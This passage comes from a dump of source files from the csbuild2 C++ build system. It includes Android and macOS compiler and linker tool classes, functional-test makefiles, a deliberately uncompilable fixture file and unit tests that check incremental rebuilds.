AndroidGccCppCompiler(GccCppCompiler, AndroidToolBase):\n\t\"\"\"\n\tAndroid GCC c++ compiler implementation\n\t\"\"\"\n\tsupportedArchitectures = AndroidToolBase.supportedArchitectures\n\n\tdef __init__(self, projectSettings):\n\t\tGccCppCompiler.__init__(self, projectSettings)\n\t\tAndroidToolBase.__init__(self, projectSettings)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\t\"\"\"\n\t\tRun project setup, if any, before building the project, but after all dependencies have been resolved.\n\n\t\t:param project: project being set up\n\t\t:type project: csbuild._build.project.Project\n\t\t\"\"\"\n\t\tGccCppCompiler.SetupForProject(self, project)\n\t\tAndroidToolBase.SetupForProject(self, project)\n\n\t\t# Applications should automatically add the default native app glue source file, but only when told to do so.\n\t\tif project.projectType == csbuild.ProjectType.Application and self._androidNativeAppGlue:\n\t\t\tnativeAppGlueSourcePath = os.path.join(self._androidInfo.nativeAppGluPath, \"android_native_app_glue.c\")\n\t\t\tassert os.access(nativeAppGlueSourcePath, os.F_OK), \"Android native app glue source file not found at path: {}\".format(nativeAppGlueSourcePath)\n\n\t\t\t# Add it directly to the project's list of input files.\n\t\t\tproject.inputFiles[\".c\"].add(InputFile(nativeAppGlueSourcePath))\n\n\tdef _getComplierName(self, project, isCpp):\n\t\tassert self._androidInfo.gccPath, \"No Android gcc executable found for 
architecture: {}\".format(project.architectureName)\n\t\tassert self._androidInfo.gppPath, \"No Android g++ executable found for architecture: {}\".format(project.architectureName)\n\t\treturn self._androidInfo.gppPath if isCpp else self._androidInfo.gccPath\n\n\tdef _getDefaultArgs(self, project):\n\t\tbaseArgs = GccCppCompiler._getDefaultArgs(self, project)\n\t\tdefaultAndroidArgs = self._getDefaultCompilerArgs()\n\t\treturn baseArgs + defaultAndroidArgs + [\n\t\t\t\"-funswitch-loops\",\n\t\t\t\"-finline-limit=100\",\n\t\t]\n\n\tdef _getPreprocessorArgs(self):\n\t\targs = [\n\t\t\t\"-D__ANDROID_API__={}\".format(self._androidTargetSdkVersion),\n\t\t\t\"-DANDROID_NDK\",\n\t\t\t\"-DANDROID\",\n\t\t\t\"-D__ANDROID__\",\n\t\t]\n\t\treturn args + GccCppCompiler._getPreprocessorArgs(self)\n\n\tdef _getArchitectureArgs(self, project):\n\t\tbuildArchName = self._getBuildArchName(project.architectureName)\n\t\treturn [\"-march={}\".format(buildArchName)] if buildArchName else []\n\n\tdef _getSystemArgs(self, project, isCpp):\n\t\targs = []\n\n\t\tif isCpp:\n\t\t\t# Add each include path for the selected version of STL.\n\t\t\tfor path in self._androidInfo.stlIncludePaths:\n\t\t\t\targs.extend([\n\t\t\t\t\t\"-isystem\",\n\t\t\t\t\tpath,\n\t\t\t\t])\n\n\t\t# Add the sysroot include paths.\n\t\tfor path in self._androidInfo.systemIncludePaths:\n\t\t\targs.extend([\n\t\t\t\t\"-isystem\",\n\t\t\t\tpath,\n\t\t\t])\n\n\t\tif self._androidNativeAppGlue:\n\t\t\targs.extend([\n\t\t\t\t\"-isystem\",\n\t\t\t\tself._androidInfo.nativeAppGluPath,\n\t\t\t])\n\n\t\treturn args\n" }, { "alpha_fraction": 0.8225806355476379, "alphanum_fraction": 0.8225806355476379, "avg_line_length": 61, "blob_id": "9147c96295a6cc844cce154b531702cda407ade2", "content_id": "5b83a5e3dd566aadf611c05f1bc98b4068027fb9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 62, "license_type": "no_license", "max_line_length": 61, "num_lines": 1, "path": "/functional_tests/explicit_sources_test/project/source/bad.cpp", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "This file is intentionally broken and should not be compiled.\n" }, { "alpha_fraction": 0.6875126361846924, "alphanum_fraction": 0.6887269616127014, "avg_line_length": 29.5, "blob_id": "1a7237cf8c7b5a36b93e1e9c09a6cb09c4fe4cab", "content_id": "1b7a278e7357a663bef9fd9c6769ff0a56cd0c13", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4941, "license_type": "no_license", "max_line_length": 117, "num_lines": 162, "path": "/csbuild/tools/linkers/mac_os_clang_linker.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: mac_os_clang_linker\n\t:synopsis: Clang linker tool for the macOS platform.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nimport os\n\nfrom .clang_linker import ClangLinker\n\nfrom ..common import FindLibraries\nfrom ..common.apple_tool_base import MacOsToolBase\n\nclass MacOsClangLinker(MacOsToolBase, ClangLinker):\n\t\"\"\"\n\tClang linker implementation\n\t\"\"\"\n\tsupportedPlatforms = { \"Darwin\" }\n\toutputFiles = { \"\", \".a\", \".dylib\" }\n\tcrossProjectDependencies = { \".a\", \".dylib\" }\n\n\tdef __init__(self, projectSettings):\n\t\tMacOsToolBase.__init__(self, projectSettings)\n\t\tClangLinker.__init__(self, projectSettings)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tMacOsToolBase.SetupForProject(self, project)\n\t\tClangLinker.SetupForProject(self, project)\n\n\tdef _findLibraries(self, project, libs):\n\t\tsysLibDirs = [\n\t\t\t\"/usr/local/lib\",\n\t\t\t\"/usr/lib\",\n\t\t]\n\t\tallLibraryDirectories = list(self._libraryDirectories) + sysLibDirs\n\n\t\treturn FindLibraries(libs, allLibraryDirectories, [\".dylib\", \".so\", \".a\"])\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = ClangLinker._getDefaultArgs(self, project)\n\n\t\t# Get the special library build flag.\n\t\tlibraryBuildArg = {\n\t\t\tcsbuild.ProjectType.SharedLibrary: \"-dynamiclib\",\n\t\t}.get(project.projectType, \"\")\n\t\targs.append(libraryBuildArg)\n\n\t\t# Set the system and SDK properties.\n\t\targs.extend([\n\t\t\t\"-mmacosx-version-min={}\".format(self._macOsVersionMin),\n\t\t\t\"-isysroot\",\n\t\t\tself._appleToolInfo.defaultMacOsSdkPath,\n\t\t])\n\n\t\treturn args\n\n\tdef _rpathStartsWithVariable(self, rpath):\n\t\treturn rpath.startswith(\"@\")\n\n\tdef _getRpathOriginVariable(self):\n\t\t# TODO: Eventually need a way to switch the default origin variable between @executable_path and @loader_path\n\t\treturn \"@executable_path\"\n\n\tdef _getRpathArgs(self, project):\n\t\targs = []\n\n\t\tif project.projectType == csbuild.ProjectType.Application:\n\t\t\targs.extend([\n\t\t\t\t\"-Xlinker\", \"-rpath\",\n\t\t\t\t\"-Xlinker\", 
self._getRpathOriginVariable(),\n\t\t\t])\n\n\t\t\trpaths = set()\n\t\t\toutDir = os.path.dirname(self._getOutputFiles(project)[0])\n\n\t\t\tif project.autoResolveRpaths:\n\t\t\t\t# Add RPATH arguments for each linked library path.\n\t\t\t\tfor lib in self._actualLibraryLocations.values():\n\t\t\t\t\tlibDir = os.path.dirname(lib)\n\t\t\t\t\trpath = self._resolveRpath(outDir, libDir)\n\n\t\t\t\t\tif rpath:\n\t\t\t\t\t\trpaths.add(rpath)\n\n\t\t\t# Add RPATH arguments for each path specified in the makefile.\n\t\t\tfor path in self._rpathDirectories:\n\t\t\t\tpath = self._resolveRpath(outDir, path)\n\n\t\t\t\tif path:\n\t\t\t\t\trpaths.add(path)\n\n\t\t\t# Add each RPATH to the argument list.\n\t\t\tfor path in sorted(rpaths):\n\t\t\t\targs.extend([\n\t\t\t\t\t\"-Xlinker\", \"-rpath\",\n\t\t\t\t\t\"-Xlinker\", path,\n\t\t\t\t])\n\n\t\telif project.projectType == csbuild.ProjectType.SharedLibrary:\n\t\t\toutFile = os.path.basename(self._getOutputFiles(project)[0])\n\t\t\targs.extend([\n\t\t\t\t\"-install_name\",\n\t\t\t\t\"@rpath/{}\".format(outFile),\n\t\t\t])\n\n\t\treturn args\n\n\tdef _getLibraryArgs(self):\n\t\tlibArgs = list(self._actualLibraryLocations.values())\n\t\tframeworkArgs = [\"-F{}\".format(path) for path in self._frameworkDirectories]\n\t\tfor framework in self._frameworks:\n\t\t\tframeworkArgs.extend([\"-framework\", framework])\n\n\t\treturn frameworkArgs + libArgs\n\n\tdef _getStartGroupArgs(self):\n\t\treturn []\n\n\tdef _getEndGroupArgs(self):\n\t\treturn []\n\n\tdef _useResponseFileWithArchiver(self):\n\t\treturn False\n\n\tdef _getOutputExtension(self, projectType):\n\t\toutputExt = {\n\t\t\tcsbuild.ProjectType.SharedLibrary: \".dylib\",\n\t\t}.get(projectType, None)\n\n\t\tif outputExt is None:\n\t\t\toutputExt = ClangLinker._getOutputExtension(self, projectType)\n\n\t\treturn outputExt\n" }, { "alpha_fraction": 0.6836695671081543, "alphanum_fraction": 0.6851922273635864, "avg_line_length": 37.07246398925781, "blob_id": "51424a4d27ed9a2b738e0e53a757a83fbe7dd45c", "content_id": "69f027b82fe5c8899d1d78883a7386a349fd0e3b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2627, "license_type": "no_license", "max_line_length": 117, "num_lines": 69, "path": "/csbuild/tools/cpp_compilers/mac_os_clang_cpp_compiler.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2013 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. 
module:: mac_os_clang_cpp_compiler\n\t:synopsis: Clang compiler tool for C++ specifically targeting macOS.\n\n.. moduleauthor:: Zoe Bare\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nfrom .clang_cpp_compiler import ClangCppCompiler\n\nfrom ..common.apple_tool_base import MacOsToolBase\n\nclass MacOsClangCppCompiler(MacOsToolBase, ClangCppCompiler):\n\t\"\"\"\n\tClang compiler for macOS implementation\n\t\"\"\"\n\tsupportedPlatforms = { \"Darwin\" }\n\tinputFiles={ \".cpp\", \".c\", \".cc\", \".cxx\", \".m\", \".mm\" }\n\n\tdef __init__(self, projectSettings):\n\t\tMacOsToolBase.__init__(self, projectSettings)\n\t\tClangCppCompiler.__init__(self, projectSettings)\n\n\n\t####################################################################################################################\n\t### Methods implemented from base classes\n\t####################################################################################################################\n\n\tdef SetupForProject(self, project):\n\t\tMacOsToolBase.SetupForProject(self, project)\n\t\tClangCppCompiler.SetupForProject(self, project)\n\n\tdef _getDefaultArgs(self, project):\n\t\targs = ClangCppCompiler._getDefaultArgs(self, project)\n\n\t\t# Set the system and SDK properties.\n\t\targs.extend([\n\t\t\t\"-mmacosx-version-min={}\".format(self._macOsVersionMin),\n\t\t\t\"-isysroot\",\n\t\t\tself._appleToolInfo.defaultMacOsSdkPath,\n\t\t])\n\n\t\treturn args\n\n\tdef _getIncludeDirectoryArgs(self):\n\t\targs = ClangCppCompiler._getIncludeDirectoryArgs(self)\n\t\targs.extend([\"-F{}\".format(d) for d in self._frameworkDirectories])\n\t\treturn args\n" }, { "alpha_fraction": 0.7383642196655273, "alphanum_fraction": 0.7428829669952393, "avg_line_length": 33.0461540222168, "blob_id": "f1b3ebab4b331cec00bff0dccbe009dda7a877c5", "content_id": "c9171f6af2c2be1fbdb4ac9773d12f98a749e23c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2213, "license_type": "no_license", "max_line_length": 79, "num_lines": 65, "path": "/functional_tests/basic_functionality_test/make.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: make\n\t:synopsis: Makefile for this test\n\n.. moduleauthor:: Jaedyn K. 
Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nfrom csbuild.toolchain import Tool\n\nclass NullClass(Tool):\n\t\"\"\"Empty tool just to make things work.\"\"\"\n\tsupportedArchitectures = None\n\tinputFiles = None\n\toutputFiles = {\"\"}\n\n\tdef Run(self, inputProject, inputFile):\n\t\treturn \"(no output)\"\n\ncsbuild.RegisterToolchain(\"msvc\", \"dummy\", NullClass)\ncsbuild.RegisterToolchain(\"gcc\", \"dummy\", NullClass)\n\nwith csbuild.Project(\"hello_world_2\", \"./\", [\"hello_world\"]):\n\twith csbuild.Target(\"debug\"):\n\t\tcsbuild.SetOutput(\"hello_world_2_debug\")\n\n\twith csbuild.Target(\"release\"):\n\t\tcsbuild.SetOutput(\"hello_world_2\")\n\nwith csbuild.Project(\"hello_world_3\", \"./\", [\"hello_world\"]):\n\twith csbuild.Target(\"debug\"):\n\t\tcsbuild.SetOutput(\"hello_world_3_debug\")\n\n\twith csbuild.Target(\"release\"):\n\t\tcsbuild.SetOutput(\"hello_world_3\")\n\nwith csbuild.Project(\"hello_world\", \"./\"):\n\twith csbuild.Target(\"release\"):\n\t\tcsbuild.SetOutput(\"hello_world_release\")\n\n\tcsbuild.SetOutput(\"hello_world\")\n" }, { "alpha_fraction": 0.7383313775062561, "alphanum_fraction": 0.7406651377677917, "avg_line_length": 33.62626266479492, "blob_id": "2b1c259d122179a468f1a930bd0c4f637dd1d4cf", "content_id": "54a3c2ca2394399903e059a6289e9d65478597cf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3428, "license_type": "no_license", "max_line_length": 125, "num_lines": 99, "path": "/functional_tests/project_dependency_test/make.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: make\n\t:synopsis: Makefile for this test\n\n.. moduleauthor:: Jaedyn K. 
Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport csbuild\nfrom csbuild.toolchain import Tool\nimport os\n\ncsbuild.SetIntermediateDirectory(\"intermediate\")\ncsbuild.SetOutputDirectory(\"out\")\n\nclass AddDoubles(Tool):\n\t\"\"\"\n\tSimple base class\n\t\"\"\"\n\tsupportedArchitectures=None\n\nclass Doubler(AddDoubles):\n\t\"\"\"\n\tSimple tool that opens a file, doubles its contents numerically, and writes a new file.\n\t\"\"\"\n\tinputFiles = {\".first\"}\n\toutputFiles = {\".second\"}\n\n\tdef Run(self, inputProject, inputFile):\n\t\twith open(inputFile.filename, \"r\") as f:\n\t\t\tvalue = int(f.read())\n\t\tvalue *= 2\n\t\toutFile = os.path.join(inputProject.intermediateDir, os.path.splitext(os.path.basename(inputFile.filename))[0] + \".second\")\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(str(value))\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\t\treturn outFile\n\nclass Adder(AddDoubles):\n\t\"\"\"\n\tSimple tool that opens multiple doubled files and adds their contents together numerically, outputting a final file.\n\t\"\"\"\n\tinputGroups = {\".second\"}\n\tcrossProjectDependencies = {\".thirdlib\"}\n\toutputFiles = {\".thirdlib\", \".thirdapp\"}\n\n\tdef RunGroup(self, inputProject, inputFiles):\n\t\tvalue = 0\n\t\tfor inputFile in inputFiles:\n\t\t\twith open(inputFile.filename, \"r\") as f:\n\t\t\t\tvalue += int(f.read())\n\n\t\tif inputProject.projectType == csbuild.ProjectType.Application:\n\t\t\tfor dep in inputProject.dependencies:\n\t\t\t\tlibFile = os.path.join(dep.outputDir, dep.outputName + \".thirdlib\")\n\t\t\t\twith open(libFile, \"r\") as f:\n\t\t\t\t\tvalue += int(f.read())\n\t\t\toutFile = os.path.join(inputProject.outputDir, inputProject.outputName + \".thirdapp\")\n\t\telse:\n\t\t\toutFile = os.path.join(inputProject.outputDir, inputProject.outputName + \".thirdlib\")\n\n\t\twith open(outFile, \"w\") as f:\n\t\t\tf.write(str(value))\n\t\t\tf.flush()\n\t\t\tos.fsync(f.fileno())\n\t\treturn outFile\n\ncsbuild.RegisterToolchain(\"AddDoubles\", \"\", Doubler, Adder)\ncsbuild.SetDefaultToolchain(\"AddDoubles\")\n\nwith csbuild.Project(\"TestProject\", \".\"):\n\tcsbuild.SetIntermediateDirectory(\"intermediate/FooIntermediate\")\n\tcsbuild.SetOutput(\"Foo\", csbuild.ProjectType.StaticLibrary)\n\nwith csbuild.Project(\"TestProject2\", \".\", [\"TestProject\"]):\n\tcsbuild.SetIntermediateDirectory(\"intermediate/BarIntermediate\")\n\tcsbuild.SetOutput(\"Bar\", csbuild.ProjectType.Application)\n" }, { "alpha_fraction": 0.7131295800209045, "alphanum_fraction": 0.7138912677764893, "avg_line_length": 39.08778762817383, "blob_id": "6006a11503f6a3a4d33b25189425ecc46894c737", "content_id": "03bdad76807d06f03dfc8d361e2446b0ace1475e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10503, "license_type": "no_license", "max_line_length": 121, "num_lines": 262, "path": "/functional_tests/basic_cpp_test/tests.py", "repo_name": "SleepingCatGames/csbuild2", "src_encoding": "UTF-8", "text": "# Copyright (C) 2016 Jaedyn K. 
Draper\n#\n# Permission is hereby granted, free of charge, to any person obtaining\n# a copy of this software and associated documentation files (the \"Software\"),\n# to deal in the Software without restriction, including without limitation\n# the rights to use, copy, modify, merge, publish, distribute, sublicense,\n# and/or sell copies of the Software, and to permit persons to whom the\n# Software is furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL\n# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\"\"\"\n.. module:: tests\n\t:synopsis: Basic test of C++ tools\n\n.. moduleauthor:: Jaedyn K. Draper\n\"\"\"\n\nfrom __future__ import unicode_literals, division, print_function\n\nimport unittest\n\nfrom csbuild._testing.functional_test import FunctionalTest\nfrom csbuild.tools.linkers.linker_base import LibraryError\nfrom csbuild._utils import PlatformBytes\n\nimport os\nimport platform\nimport subprocess\nimport time\n\ndef Touch(fname):\n\t\"\"\"\n\tTouch a file to update its modification time\n\t:param fname: Filename\n\t:type fname: str\n\t\"\"\"\n\twriteBit = 0x80\n\toldPermissions = os.stat(fname).st_mode\n\tisReadOnly = not oldPermissions & writeBit\n\tif isReadOnly:\n\t\tos.chmod(fname, oldPermissions | writeBit)\n\ttry:\n\t\twith open(fname, 'a'):\n\t\t\t# Mac has terrible filesystem time resolution, so we have to force a sleep\n\t\t\t# in order for changes to be picked up.\n\t\t\tif platform.system() == \"Darwin\":\n\t\t\t\ttime.sleep(1)\n\t\t\tos.utime(fname, None)\n\tfinally:\n\t\tif isReadOnly:\n\t\t\tos.chmod(fname, oldPermissions)\n\nclass BasicCppTest(FunctionalTest):\n\t\"\"\"Basic C++ test\"\"\"\n\n\t# pylint: disable=invalid-name\n\tdef setUp(self): # pylint: disable=arguments-differ\n\t\tif platform.system() == \"Windows\":\n\t\t\tself.outputFile = \"static/hello_world.exe\"\n\t\telse:\n\t\t\tself.outputFile = \"static/hello_world\"\n\t\toutDir = \"static\"\n\n\t\tFunctionalTest.setUp(self, outDir=outDir, cleanArgs=[\"--project=hello_world\", \"--project=libhello\", \"--at\"])\n\n\t\twith open(\"libhello/libhello.cpp\", \"rb\") as f:\n\t\t\tdata = f.read()\n\t\tif b\"!!!\" in data:\n\t\t\t# Just in case the \"modify and rebuild library\" test fails to clean up after itself...\n\t\t\twith open(\"libhello/libhello.cpp\", \"wb\") as f:\n\t\t\t\tf.write(data.replace(b\"!!!\", b\"!\"))\n\n\tdef testCompileSucceeds(self):\n\t\t\"\"\"Test that the project successfully compiles\"\"\"\n\t\tself.assertMakeSucceeds(\"-v\", \"--project=libhello\", \"--show-commands\")\n\t\tself.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, World! 
Goodbye, World!\"))\n\n\t\t# Verify a successive compile succeeds.\n\t\tself.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\n\[email protected](platform.system() == \"Linux\", \"Clang test is only supported on Linux\")\n\tdef testClangCompileSucceeds(self):\n\t\t\"\"\"Test that the project successfully compiles with the clang toolchain\"\"\"\n\t\tself.cleanArgs = [\"--project=libhello\", \"--project=hello_world\", \"--toolchain=clang\"]\n\n\t\tself.assertMakeSucceeds(\"-v\", \"--toolchain=clang\", \"--project=libhello\", \"--show-commands\")\n\t\tself.assertMakeSucceeds(\"-v\", \"--toolchain=clang\", \"--project=hello_world\", \"--show-commands\")\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, World! Goodbye, World!\"))\n\n\tdef testLibraryFail(self):\n\t\t\"\"\"Test that invalid libraries cause a failure\"\"\"\n\t\tself.cleanArgs = [\"--project=fail_libraries\"]\n\t\tself.assertMakeRaises(LibraryError, \"-v\", \"--project=fail_libraries\", \"--show-commands\")\n\n\tdef testRecompileDoesntCompileOrLinkAnything(self):\n\t\t\"\"\"Test that recompiling without any changes doesn't do anything\"\"\"\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=libhello\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling libhello/libhello.cpp\", out)\n\t\tself.assertIn(\"Linking libhello\", out)\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling hello_world/hello.cpp\", out)\n\t\tself.assertIn(\"Compiling hello_world/main.cpp\", out)\n\t\tself.assertIn(\"Linking hello_world\", out)\n\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\tself.assertNotIn(\"Compiling hello_world/hello.cpp\", out)\n\t\tself.assertNotIn(\"Compiling hello_world/main.cpp\", out)\n\t\tself.assertNotIn(\"Linking hello_world\", out)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, World! Goodbye, World!\"))\n\n\tdef testRecompileAfterTouchRebuildsOnlyOneFile(self):\n\t\t\"\"\"Test that recompiling after touching one file builds only that file\"\"\"\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=libhello\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling libhello/libhello.cpp\", out)\n\t\tself.assertIn(\"Linking libhello\", out)\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling hello_world/hello.cpp\", out)\n\t\tself.assertIn(\"Compiling hello_world/main.cpp\", out)\n\t\tself.assertIn(\"Linking hello_world\", out)\n\n\t\tTouch(\"hello_world/hello.cpp\")\n\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling hello_world/hello.cpp\", out)\n\t\tself.assertNotIn(\"Compiling hello_world/main.cpp\", out)\n\t\tself.assertIn(\"Linking hello_world\", out)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, World! 
Goodbye, World!\"))\n\n\t\tTouch(\"hello_world/main.cpp\")\n\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\tself.assertNotIn(\"Compiling hello_world/hello.cpp\", out)\n\t\tself.assertIn(\"Compiling hello_world/main.cpp\", out)\n\t\tself.assertIn(\"Linking hello_world\", out)\n\n\t\tself.assertTrue(os.access(self.outputFile, os.F_OK))\n\t\tout = subprocess.check_output([self.outputFile])\n\n\t\tself.assertEqual(out, PlatformBytes(\"Hello, World! Goodbye, World!\"))\n\n\tdef testRecompileAfterTouchingHeaderRebuildsBothFiles(self):\n\t\t\"\"\"Test that recompiling after touching a header causes all cpp files that include it to recompile\"\"\"\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=libhello\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling libhello/libhello.cpp\", out)\n\t\tself.assertIn(\"Linking libhello\", out)\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling hello_world/hello.cpp\", out)\n\t\tself.assertIn(\"Compiling hello_world/main.cpp\", out)\n\t\tself.assertIn(\"Linking hello_world\", out)\n\n\t\tTouch(\"hello_world/header.hpp\")\n\n\t\t_, out, _ = self.assertMakeSucceeds(\"-v\", \"--project=hello_world\", \"--show-commands\")\n\t\tself.assertIn(\"Compiling hello_world/hello.cpp\", out)\n\t\tself.assertIn(\"Compiling hello_world/main.cpp\", out)\n\t\tself.assertIn(\"Linking hello_world\", out)\n\n\t\tself.assertTrue(os.access(self.outputFile, 